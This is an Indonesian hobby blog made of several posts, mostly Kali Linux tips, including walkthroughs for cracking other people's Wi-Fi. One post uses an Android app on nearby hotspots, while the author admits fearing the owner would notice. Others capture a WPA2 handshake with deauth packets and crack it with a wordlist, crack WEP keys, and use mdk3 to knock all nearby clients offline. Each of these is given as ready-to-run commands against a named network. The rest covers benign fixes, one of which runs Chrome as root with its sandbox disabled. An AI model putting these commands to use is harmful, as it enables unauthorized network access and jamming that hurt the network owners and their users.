Sunday 22 May 2016

Wi-Fu.. Hacking WIFI Hotspot Dengan Android

Hacking Wifi Hotspot Dengan Android - Nubie Zone, Internet Gratis Android - Nubie Zone
Wifi Kungfu

Mungkin Agan semua udah pada tau, Hacking Wifi Akses Point bisa dilakukan dengan mudah, hanya menggunakan Smartphone berbasis Android dan sebuah tool yang tersedia secara gratis di Playstore.

Tersedia banyak pilihan aplikasi untuk meretas keamanan hotspot, mulai dari Wifi Analyzer, Wifi Map, sampai pada WPS Tester. Semua aplikasi tersebut merupakan tools untuk Cracking Wifi AksesPoint secara online.

Dan pada post ini, Gwe pengen review atau menjelaskan (sebisa gwe) tentang bagaimana cara mengkoneksikan Hape Android ke Wifi Hotspot, agar kita bisa mengakses Internet secara GRATIS..

Tool yang gwe gunakan adalah Wifi Master Key..
Silahkan install dulu dari Playstore :

Internet Gratis dengan Wifi Master Key di Android - Nubie Zone
Wifi Master Key

Setelah selesai install, langsung aja di buka aplikasinya..

Hacking Wifi dengan Android - Nubie Zone
Wifu Android

Hehehe...
Sorry gan...
Tool ini adalah tool Wifi Cracker Online..
Jadi membutuhkan quota internet untuk mengakses servernya..
Gak banyak kok, cuman sekitar 15 kb..

Hacking Wifi Hotspot dengan Android - Nubie Zone
Wifu Android - Wifi Key Master

Setelah terbuka, Wifi Key Master secara otomatis akan scanning akses point yang tersedia..

Hacking Wifi Hotspot dengan Android - Nubie Zone
Wifu Android - Scanning

Tekan pada Hotspot yang ingin di cracking,, dan kemudian akan muncul sebuah menu GUI..

Hacking Wifi Hotspot dengan Android - Nubie Zone
Wifu Android - Menu Auto Connect

Klik Auto Connect,, dan proses Cracking akan segera berjalan..
Lalu akan ada popup pemberitahuan, apakah crackingnya berhasil atau tidak.. dan kalo berhasil,, maka Wifi Master Key akan mengkonek-kan Ponsel kita dengan Hotspot tersebut secara online..

Duuuuh maaff...
Lupa ambil screenshot popupnya..
hehehe..

Maklum gan, gwe buru2 takut ktahuan sama yang punya...

Hacking Wifi Hotspot dengan Android - Nubie Zone
Wifu Android - Cracking Sukses


NOTES:

Perlu di ketahui bahwa, TIDAK SEMUA WIFI BISA KITA CRACK...!!
Dari explorasi tool ini,, menurut gwe, tool ini hanya WORK pada Wifi type WEP... Sedang pada WPA, hanya dengan WPS Mode On..
Jadi semacam Reaver kalo pada Kali Linux..
Hanya saja, Proses cracking atau bruteforce WPS dilakukan secara online, dan (pendapat pribadi) menggunakan server yang tangguh..
Karena proses nya terjadi sekitar 30 detik..
Gak sampe malah...
Sedangkan kalo Reaver, prosesnya menggunakan GPU PC atau Lepi kita..
jadi ya lambat..

Kalo kesimpulan gwe salah,, tolong di benerin lewat komentar gan..



Semoga Bermanfaat,,

Dosanya di tanggung sendiri lho gan...
wkwkwkwkwkw....



Thursday 5 May 2016

Wi-Fu.. Hacking WIFI WPA2-PSK Dengan Aircrack-ng Di Kali v2




 Seperti biasa gan,,
langsung aja buka konsole...

~# airmon-ng start wlan0


Jika terjadi error saat menjalankan perintah di atas,,
coba ketik perintah berikut..

~# airmon-ng check kill


Kalo nggak ada masalah,,
kita lanjutin acaranya....

Finding the target :

~# airodump-ng wlan0mon


Disini gwe pake interface monitornya wlan1
Sesuaikan ajah dengan interface masing2....

 Cari target yang sesuai gan..
Yang kira2 ada client nya.....

Kalo udah dapet target nya,,
tutup dulu airodump-ng nya...

Disini gwe memilih target Wpa2 Psk...

Nama AP : Sarangmas

BSSID : 9C:97:26:36:6D:0B

Channel : 6



Okey..
Selanjutnya kita dapetin handsahake nya...

~# airodump-ng --bssid 9C:97:26:36:6D:0B --channel 6 wlan0mon -w contoh


-w contoh adalah nama file output hasil airodump-ng,,
yang mana di file inilah handshake akan di record...  


Dan kita biarkan terminal tetap terbuka untuk capturing paket handshake..



Handshake akan kita dapat jika terdapat client yang login..

Dan kita akan putuskan koneksi client dengan akses point,,
supaya si client tadi melakukan login ulang..

Dan jika itu terjadi,,
maka handshake akan kita dapatkan..

~# aireplay-ng --deauth 12 -a 9C:97:26:36:6D:0B wlan0mon


Serangan ini akan lebih efektif jika kita memasukkan MAC Address client secara spesifik..

~# aireplay-ng --deauth 12 -a 9C:97:26:36:6D:0B -c xx:xx:xx:xx:xx:xx wlan0mon



Ganti xx:xx:xx (merah) diatas,,
dengan mac address atau bssid dari salah satu client yang ada...


Tunggu sampai kita dapat handshakenya..

Jika dirasa agak susah dapat handshake,,
tambahkan nilai --deauth nya..

Misal --deauth 64..

Atau --deauth 0 (enol)..

Dan aireplay akan mengirim paket deauth secara terus menerus 
sampai kita hentikan dengan CTRL + C...


Jika sudah kita dapatkan handshakenya,,
tutup airodump-ng..



Dan sekarang saatnya kita cracking file captured nya..
untuk mendapatkan passwordnya..

~# aircrack-ng -b 9C:97:26:36:6D:0B contoh-01.cap -w wordlist.txt


Jika passwordnya ada di dalam file wordlist.txt tadi,,
maka password akan FOUNDED..

Jika tidak yaaa ganti pake wordlist yang laen..


Keberhasilan teknik ini,,
sangat bergantung pada wordlist untuk proses crackingnya...

Karena itu siapkan dulu wordlist yang ampuh gan..

Silahkan download dulu wordlistnya..

DI gugel banyak kok...

Atau di forum IBT..

Atau pake saja wordlist default (rockyou.txt) bawaan Kali..
Biasanya terletak di /usr /share/wordlists/rockyou.txt

Kalo masih dalam bentuk .gz , di extract dulu gan..

~# gzip -d /usr /share/wordlists/rockyou.txt.gz



Semoga bermanfaat...


Atau cobain koleksi gwe gan..
Ntar gwe tambahin lagi kalo ada waktu luang,, InsyaAllah...

Thursday 18 February 2016

Cara Menghilangkan Pesan Warning Pada Google Chrome



Hal ini terjadi, jika kita membuka Google Chrome sebagai root..

Secara default,, Google Chrome hanya untuk di buka oleh user,, bukan root..

Namun kita bisa push Chrome agar bisa di bukan sebagi root
dengan menambahkan --user-data-dir --no-sandbox
pada file shell script Google Chrome..

Dan kita pun sudah bisa menjalankan Chrome sebagai root..



Namun,, ada pesan warning pada awal loading Chrome...

..You are using an unsupported command-line flag: --no-sandbox...



Sebenarnya,,,
pesan warning tersebut, hanyalah memberitahukan bahwa kita telah mendisable sandbox pada Browser Google Chrome..
Dan itu membuat kita lebih riskan dan rentan...

Namun, walaupun pesan itu hanyalah sebagai pemberitahuan,, 
dan tidak menybabkan adanya gangguan atau error pada Chrome,,
tetapi kehadirannya masih bisa menyakitkan mata....

Karena seolah2 terdapat error pada Chrome kita...
hehehee....


Ketik di terminal :

~# leafpad /opt/google/chrome/google-chrome


Dan tambahkan baris ini di belakang --user-data-dir --no-sandbox %U
  --test-type --process-per-site --disk-cache-dir=/tmp/cache --disable-rich-notifications

Dan pesan warning pada Google Chrome akan hilang..


Semoga bermanfaat...


Fix Kresource Migration Tool Kaliv2

 Gwe pun nggak pasti,
sesungguhnya apa yang jadi penyebabnya...

Setelah upgrade,
tiba2 muncul pesan error saat booting Kaliv2 seperti di gambar atas..

KResourceMigration Tool
Trying to migrate 'Default Address Book'...
Creating instance of type akonadi_vcard_resource

Padahal,, waktu upgrade,,    tidak ada warning atau error....?!

========== @@@ ==========


Setelah sowan ke pertapaan Eyang Google,,
ternyata banyak yang mengalami hal serupa....

Jenis error dan penyebabnya juga bervariasi...
dari server Mysql gagal start,,  sampai pada pengaturan config kres-migratorrc..
yang semuanya nggak bisa solve error gwe..

Namun di salah satu forum komunitas Gentoo..
gwe akhirnya menemukan solusi yang gwe cari..


Buka console dan ketik :

~# kwriteconfig --file kres-migratorrc --group Migration --key Enabled --type bool false

Jadi apa sebenarnya yang menjadi penyebabnya..??

Ternyata penyebab utamanya adalah,,
file kres-migratorrc nggak ada atau hilang..

Hal ini terjadi karena waktu install,, gwe buat satu user..
Kemudian gwe login pun sebagai user, bukan root..
jadi sewaktu proses upgrade,,
file config kres-migratorrc nya masuk di user gwe,, bukan di directory /root...

Hehehehe....
Sebuah pengalaman berharga...

Walopun harus menghabiskan waktu hampir seminggu,,
namun perasaan "bisa menaklukkan si naga hitam" 
merupakan sebuah kepuasan dan kebahagiaan tersendiri..



Semoga bermanfaat....


NOTE :
Error ini hanya terjadi pada pengguna KDE..

Saturday 6 February 2016

Mengatur Jumlah Page Thumbnail pada TAB Firefox



 Terasa gak enak aja,,
jika setiap buka tab baru,,
thumbnailnya gak ngepas sama screen..

Dan harus di scroll untuk melihat keseluruhan page viewnya..
Gak praktis,, gak rapi...
Itu nurut gwe......



 Arahkan ke kolom URL..
lalu ketik about:config

Akan muncul popup warning..
klik aja tombol I Promise



Di kolom pencarian,, masukkan filter..

 browser.newtabpage.rows




Klik dua kali pada menu browser newtab tadi..
 dan akan muncul popup untuk mengubah nilai integernya
kemudian klik OK
Dan tabpage thumbnailnya udah enakan di lihat...





Semoga Bermanfaat..


Fix VLC di Kali V2 dengan GHEX dan HEXEDIT




Selalunya VLC gak bisa di buka di Kali..
Hal ini karena di Kali,, default loginnya adalah root,,
sedang VLC secara default hanya bisa di buka sebagai user..

Masalah ini bisa di atasi dengan mengubah permision pada VLC..

Buka hex editor anda..
Di Kali secara default sudah ada yaitu ghex..
ketik di terminal :

~# ghex /usr/bin/vlc


seperti ini tampilannya...
 Klik pada menu Edit dan klik Replace 

Kemudian isikan di kolom atas geteuid dan di kolom bawah getppid..
 Terus klik Replace All
Tutup popupnya trus klik save pada window ghex


========================================

Anda juga bisa menggunakan hexa editor yang lain..
misalnya hexedit..

Install dulu hexeditnya..

~# apt-get install hexedit

Jika sudah terinstall
ketik di terminal...:

~# hexedit /usr/bin/vlc
 Klik pada tombol TAB di keyboard..
kemudian CTRL + S
lalu ketikkan geteuid terus tekan ENTER
 Arahkan kursor sehingga menepati posisi huruf,, kemudian terus ketik pp..
sehingga geteuid berganti menjadi getppid..
 Jika sudah,, tekan CTRL + S lagi
dan lanjutkan dengan tekan huruf Y pada keyboard untuk save
 Dan VLC akan berjalan normal..

Semoga bermanfaat...


Saturday 21 November 2015

Fix Error Kernel Driver Not Installed (rc=-1908) Pada VirtualBox di Kaliv2


Pernah mengalaminya..??

Di OS Kali,,
error seperti ini agak sering terjadi,,
terutama di sebabkan oleh kelalaian kita saat menginstall VirtualBox..

Kita lupa untuk menginstall paket DKMS,,
( Dynamic Kernel Module Support )

yaitu sebuah program yang menjaga kompatibilitas module kernel,,
dengan me-rebuilt module yang selaras ketika kernel baru di install...

Maaf kalo salah..








Langsung ajah gan...

Buka Konsole dan uninstall virtualboxnya

~# apt-get purge --remove virtualbox


Kemudian update packages listnya..

~# apt-get update


Dan install dkms..

~# apt-get install dkms


Bagi yang udah install dkms sebelumnya,,
namun masih terjadi error ini,, lakukan install ulang dkms..

~# apt-get install --reinstall dkms


Install jugak kernel header sesuai dengan versi kernel yang digunakan..

~# apt-get install linux-headers-`uname -r`


Dan terakhir,,
install kembali virtualboxnya..

~# apt-get install virtualbox



Tunggu hingga proses selesai..
dan VirtualBox siap di jalankan....

Semoga barmanfaat...




Thursday 12 November 2015

Wi-Fu.. Hacking WIFI WEP Dalam 4 Menit Dengan Kali v2




Kagak perlu banyak cing-cong...
Langsung ajah buka terminal...

~# airmon-ng start wlan0


(gwe menggunakan wlan1 gan)

 Cari target yang menggunakan security WEP..

~# airodump-ng wlan0mon


Jika terjadi error dengan interfacenya,,
silahkan diliat cara fixnya..

Kalo sudah dapet target,, tutup airodump-ng nya..
dengan menekan CTRL + C

Inget,,
Cari yang WEP..
Sebab cara ini hanya untuk WEP,, bukan WPA/WPA2...

Perhatikan BSSID dengan channel...


 ~# airodump-ng wlan0mon --bssid BSSID --channel CHANNEL -w file

Ganti tulisan merah sesuai dengan data target..
-w file adalah nama file hasil dumping..


Biarkan terminal tetap terbuka untuk menampung data IVs..



Langkah selanjutnya adalah Assosiation wifi adapter kita..

~# aireplay-ng -1 9 -a BSSID wlan0mon


Dan biarkan terbuka terminalnya supaya MAC accress kita selalu ter-assosiation dengan akses point terget..
Buka terminal baru untuk menjalankan arpreplay

~# aireplay-ng -3 -b BSSID wlan0mon
Dan biarkan terbuka juga..
 Berikutnya buka lagi satu terminal..

~# aireplay-ng -8 -b BSSID wlan0mon


 Dan Yappp...
Biarkan tetap terbuka...


Sekarang perhatikan peningkatan frame IVs pada terminal airodump..

Akan terjadi peningkatan secara drastik..
Dan ini akan mempercepat proses crackingnya menggunakan aircrack-ng..

Namun jika tidak terlihat adanya perubahan,,
buka terminal lagi dan lakukan deauth..
~# aireplay-ng -0 12 -a BSSID wlan0mon

 Dan lihat kembali terminal airodump-ng nya..

WAAAOOOO...

 Saatnya cracking..

Buka terminal yang terakhir..

~# aircrack-ng -a 1 -b BSSID file-01.cap


Masih ingat di awal tadi..??
airodump-ng -w file...??




 Tungguin aja aircrack-ng menjalankan tugasnya..

Paling nggak sampe semenit gan...

 Daann...

GOTCHA...
KEY FOUND..........!!







GAMEOVER...


Videonya di sini gan..







ENJOOOYYY......



Memutus Koneksi Wifi Dengan MDK3 di Kali v2





Teknik memutuskan koneksi wifi dalam jaringan dengan mdk3,,
merupakan teknik penyerangan untuk memutuskan koneksi client dengan Akses Point..

Sedikit penjelasan tentang mdk3,,
bahwa mdk3 menghantar paket deauth dan disassociation secara serentak,,
sehingga koneksi klient terputus..


Hal ini berlangsung selama mdk3 tidak dimatikan..
Dan karena itu,,
mdk3 dapat merusak chipset wifi pci jika digunakan terlalu sering,,
dan dalam jangka waktu yang lama..


SARAN :
Gunakan teknik mdk3 jika keadaan sangat mendesak saja..
Jangan terlalu keseringan..



Okey..
kita mulakan langkah3nya...


Buka terminal..

~# airmon-ng start wlan0

Disini,,
gwe menggunakan wlan1..
jadi monitor ifacenya adalah wlan1mon...


Siap beraksi...

~# mdk3 wlan0mon d


Dengan perintah diatas,,
maka mdk3 akan membabat semua koneksi yang berada dalam jangkauan..
secara membabi buta tanpa terkecuali..


Jika serangan kita ingin lebih effisien,,
tambahkan -c untuk channel AP..

~# mdk3 wlan0mon d -c 11


Itu akan memutus koneksi AP yang berada di channel 11..
Channel AP dimana gwe terkoneksi melalui wlan0.




Terlihat di gambar,,
koneksi gwe juga terputus gan


Terminal kiri adalah terminal mdk3..

Terminal kanan adalah terminal airodump-ng
untuk monitoring..

Gambar depan (kecil)
adalah kde daemon untuk memasukkan password wifi..

Lingkaran merah adalah notis wpa handshake..

Sedang tanda panah putih (pojok atas)
adalah display koneksi wifi gwe yang terputus..



Dan kalo ingin koneksi kita gak ikut terputus,,
tambahkan -w untuk whitelist..

Sebelumnya buat dulu file listnya..

~# echo [MAC ADDRESS KALIAN] > white.txt


Lalu jalankan mdk3 nya..

~# mdk3 wlan0mon d -c 11 -w white.txt




Yesss...
Koneksi gwe aman...


Dan terakhir,,
Jika kita ingin tetap konek,,
namun ingin memutus klient lain yang nakal,,
gunakan -b pada mdk3..

Buat dulu filenya

~# echo MAC ADDRESS >  black.txt


ATTAAAAAACCKKK....


~# mdk3 wlan0mon d -w white.txt -b black.txt



Enjooyyy....



Dan semoga bermanfaat..



Tuesday 10 November 2015

Unofficial Kali v1 Repositories






Masih pake Kali versi 1..??

Yang sering nanyain tentang repo..

Repo atau lengkapnya repository adalah url khusus suatu distro..

Dimana dari URL itulah User bisa update atau upgrade OSnya..

Juga untuk menginstall sebuah program yang di sediakan oleh Developer..


Itu pendapat gwe pribadi lho gan..

Kalo salah yaa maaaff...


Dan berikut ini adalah repo untuk Kali v1...

Official dan Unofficial...


Silahkan di sedoot....






ENJOOOOOYY....


Mempercantik Tampilan Terminal / Konsole



Bagi yang ingin mempercantik tampilan terminal atau konsole..

Segera buka konsole kemudian ketik :

~# apt-get install figlet cowsay screenfetch


Kemudian edit bashrcnya..

~# nano .bashrc


Lalu tambahkan di akhir baris..

figlet Hacker Inside


atau menggunakan cowsay..

/usr/games/cowsay -f eyes HACKER INSIDE


Atau tambahkan screenfetch di akhir line bashrc..




Atau bagi yang udah males benner ngedit2 file bashrc..

Doongloot aja filenya di sini..






Setelah didownload,,
ekstrak file zip diatas kemudian rename menjadi
.bashrc

dan tempatkan di folder home..




ENJOOOOYYY....